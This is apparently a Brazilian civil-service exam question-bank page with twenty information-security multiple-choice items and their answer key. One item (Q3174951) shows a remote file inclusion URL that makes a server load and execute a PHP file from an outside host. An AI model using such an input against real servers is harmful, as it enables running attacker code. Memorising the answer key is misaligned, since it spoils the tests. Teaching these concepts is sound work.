Questões de Concurso

Foram encontradas 10.458 questões

Resolva questões gratuitamente!

Junte-se a mais de 4 milhões de concurseiros!

Q3181000 Segurança da Informação
Em uma organização com alto volume de dados, o administrador implementou um sistema de backup incremental para otimizar o armazenamento e minimizar o tempo necessário para o processo. Ele também configurou permissões de pastas em níveis hierárquicos, assegurando que cada setor acessasse apenas os arquivos relacionados às suas atividades. Durante um teste, foi identificado que um arquivo excluído acidentalmente por um usuário padrão não estava disponível na Lixeira do sistema.

Sobre as práticas de gerenciamento de arquivos e backup nesse cenário, assinale a alternativa CORRETA.
Alternativas
Q3178704 Segurança da Informação
Em uma transação bancária online, garantir que as informações transmitidas sejam confidenciais e que apenas o destinatário possa acessá-las é essencial para a segurança. A criptografia de chave pública desempenha um papel importante nesse processo, utilizando um par de chaves para proteger os dados. Com base nesse contexto, analise as assertivas abaixo:

I. A chave pública é usada para criptografar a mensagem, e a chave privada é utilizada para decriptá-la, garantindo que apenas o destinatário pretendido consiga ler os dados.

II. RSA e ECC são abordagens amplamente utilizadas em criptografia de chave pública devido à sua capacidade de fornecer segurança com diferentes tamanhos de chave.

III. A criptografia de chave pública é mais eficiente em termos de processamento do que a criptografia simétrica, especialmente para grandes volumes de dados.


Quais estão corretas?
Alternativas
Q3178541 Segurança da Informação
Referente à gestão de riscos em segurança da informação, analise as assertivas abaixo:

I. A análise de riscos envolve a identificação e avaliação dos riscos que podem impactar a segurança da informação.

II. O tratamento de risco pode incluir medidas para mitigar, transferir, aceitar ou evitar o risco.

III. O risco residual é o risco que permanece após a implementação de medidas de tratamento de risco.

Quais estão corretas?
Alternativas
Q3178539 Segurança da Informação
Em relação às definições de incidentes de segurança da informação, analise as assertivas abaixo:

I. Um incidente de segurança é qualquer evento que ameaça a confidencialidade, integridade ou disponibilidade da informação.
II. Incidentes de segurança podem ser causados por ações deliberadas ou acidentais.
III. Todos os incidentes de segurança resultam em perda de dados.


Quais estão corretas?
Alternativas
Q3178538 Segurança da Informação
O não repúdio, em segurança da informação, é a:
Alternativas
Q3176976 Segurança da Informação
A Norma Complementar nº 20/IN01/DSIC/GSIPR estabelece diretrizes para o processo de tratamento da informação nos órgãos da Administração Pública Federal. Assinala a afirmativa que está relacionada à proteção da informação durante todo o seu ciclo de vida.
Alternativas
Q3176975 Segurança da Informação
Analisa as afirmativas abaixo sobre a Norma Complementar nº 08/IN01/DSIC/GSIPR, que estabelece diretrizes para o gerenciamento de incidentes em redes computacionais na Administração Pública Federal. quanto aos processos que devem ser implementados para o gerenciamento de incidentes.
I. Exclusão imediata dos registros de incidentes após a solução do problema para evitar sobrecarga de sistemas.
II. Manutenção de equipes de resposta apenas durante o horário comercial, exceto em casos de ataques críticos.
III. Registro detalhado de incidentes para análise posterior, comunicação com partes interessadas e melhoria contínua dos procedimentos.
IV. Implementação de medidas punitivas automáticas contra possíveis agressores sem investigação formal.
Está(ão) correta(s) a(s) afirmativa(s): 
Alternativas
Q3176974 Segurança da Informação
Analisa as afirmativas abaixo sobre a Norma Complementar nº 05/IN01/DSIC/GSIPR, que disciplina a criação de Equipes de Tratamento e Respostas a Incidentes (ETIR) na Administração Pública Federal.
São atribuições típica dessas equipes:
I. Armazenar informações pessoais de cidadãos sem consentimento.
II. Prevenir e detectar incidentes de segurança em redes computacionais.
III. Coordenar ações de resposta a incidentes de segurança.
IV. Comunicar incidentes ao Gabinete de Segurança Institucional da Presidência da República.
Está(ão) incorreta(s) a(s) afirmativa(s):
Alternativas
Q3176969 Segurança da Informação
O protocolo Secure Shell (SSH) é amplamente utilizado para acesso remoto seguro a servidores e a dispositivos de rede. Em relação ao SSH, assinala a afirmativa correta. 
Alternativas
Q3176952 Segurança da Informação
Sobre o conceito de hash, assinala a afirmativa correta.
Alternativas
Q3175756 Segurança da Informação
Assinale a alternativa que corresponde a um tipo de ataque a redes de computadores cujo objetivo é realizar buscas detalhadas em redes, com o propósito de descobrir informações sobre programas ou serviços de computadores ativos.
Alternativas
Q3175754 Segurança da Informação
A Infraestrutura de Chaves Públicas Brasileira (ICP-Brasil) é uma cadeia hierárquica de confiança que viabiliza a emissão de certificados digitais para identificação virtual do cidadão. No ecossistema da ICP-Brasil, o ente responsável por emitir, distribuir, renovar, revogar e gerenciar certificados digitais é chamado de:
Alternativas
Q3175753 Segurança da Informação
Segundo a Norma ISO/IEC 27002:2013, são controles relacionados à gestão de ativos, EXCETO: 
Alternativas
Q3175751 Segurança da Informação
Qual é o protocolo de rede que provê serviços do protocolo TCP aprimorados com serviços de segurança, tais como: sigilo, integridade dos dados, autenticação do servidor e autenticação do cliente?
Alternativas
Q3175750 Segurança da Informação
Sobre o uso de DMZ (Demilitarized Zone) em uma organização, é INCORRETO afirmar que: 
Alternativas
Q3174951 Segurança da Informação
A página web da sociedade empresária Exemplo1234, disponível na internet, permite que internautas acessem o edital de uma vaga de trabalho por meio do endereço eletrônico http://empresa1234.com/vaga.php?file=vaga.pdf.
Durante a verificação de vulnerabilidades contratada por essa empresa, foi observado que o servidor da página web da Empresa1234 processava o valor fornecido no parâmetro file sem realizar validação ou sanitização adequada.
Como resultado, foi possível incluir e executar no servidor o conteúdo de um arquivo malicioso hospedado no endereço http://testevulnerabilidade.com/badpage.php
O teste foi realizado utilizando o seguinte endereço:
http://empresa1234.com/vaga.php?file=http://testevulnerabilida de.com/badpage.php
Ao acessar essa URL, o conteúdo do arquivo badpage.php foi carregado e executado diretamente pelo servidor da Empresa1234, comprometendo sua segurança.
O tipo de vulnerabilidade presente no servidor de página da Empresa1234 é o 
Alternativas
Q3174950 Segurança da Informação
Durante uma auditoria no setor de TI de TCE-RR, foi constatado que os analistas estavam utilizando criptografia por chave pública para o envio de informações confidenciais. Para garantir que os dados sejam protegidos contra acessos não autorizados, cada servidor precisa configurar corretamente as chaves de criptografia antes de iniciar a troca de mensagens.
Com base no funcionamento da criptografia assimétrica, sobre o processo de envio de uma mensagem criptografada é correto afirmar que
Alternativas
Q3174948 Segurança da Informação
Analistas do TCE-RR utilizavam uma plataforma web interna para registrar auditorias. Durante a análise de segurança, foi detectado que áreas de entrada de texto na plataforma, usadas para registrar observações em relatórios, continham código malicioso armazenado no servidor.
Esse código era executado automaticamente no navegador de qualquer funcionário que visualizasse os relatórios, redirecionando-os para sites fraudulentos.
Nesse contexto, o ataque foi identificado como
Alternativas
Q3174804 Segurança da Informação
A criptografia dos dados em diferentes estados vem sendo utilizada tanto para garantir a segurança quanto para prevenir possíveis vazamentos de informações sensíveis.
No contexto de segurança de banco de dados, avalie as afirmativas a seguir.

I. O protocolo HTTPS, bem como outros similares, tem se tornado default para APIs na nuvem modernas.
II. Criptografia de disco completo em laptops são essenciais para proteger dados em caso de roubo do dispositivo.
III. Todas as formas de dados armazenados, incluindo dados em servidores, sistemas de arquivos, bancos de dados e armazenamento em nuvem, devem ser criptografadas para proteger contra acessos não autorizados.

Acerca do estado dos dados nas três afirmativas, é correto afirmar que
Alternativas
Q3174798 Segurança da Informação
Suponha que o TCE-RR adote a estratégia de backup diferencial, com execução diária, e realize um backup completo apenas uma vez por semana. No quinto dia após o backup completo, um incidente ocorre algumas horas depois da execução do backup diferencial diário, que foi realizado com sucesso, exigindo a restauração dos dados para o ponto mais recente possível.
Sobre o processo de recuperação nesse caso, assinale a afirmativa correta. 
Alternativas
Respostas
61: A
62: C
63: D
64: D
65: A
66: E
67: C
68: D
69: A
70: E
71: A
72: A
73: C
74: D
75: B
76: D
77: B
78: C
79: C
80: D